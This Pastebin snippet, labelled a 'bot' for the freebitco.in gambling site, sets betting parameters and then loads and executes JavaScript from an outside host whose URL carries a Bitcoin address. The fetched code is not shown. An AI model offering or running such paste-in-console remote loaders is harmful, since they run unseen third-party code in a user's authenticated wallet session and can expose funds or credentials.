xZero

phptaskforce.uk.to freebitco.in Bot

Jun 19th, 2014
492
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. config = {
  2.         tolerance   : 8,
  3.         sleep       : 1300,
  4.         goal        : 0.00001500,
  5.         btcGuard    : 0.00000050,
  6.         startStake  : '0.00000002',
  7.         toggle      : true,
  8.         delayLimit  : 250
  9.     };
  10.          
  11.     $.getScript(
  12.         'http://phptaskforce.uk.to/addr/1BtEZXCULJb37vPL1vz7sQjrChwDdStf8z',
  13.         function() { init(); }
  14.     );
Advertisement
Add Comment
Please, Sign In to add comment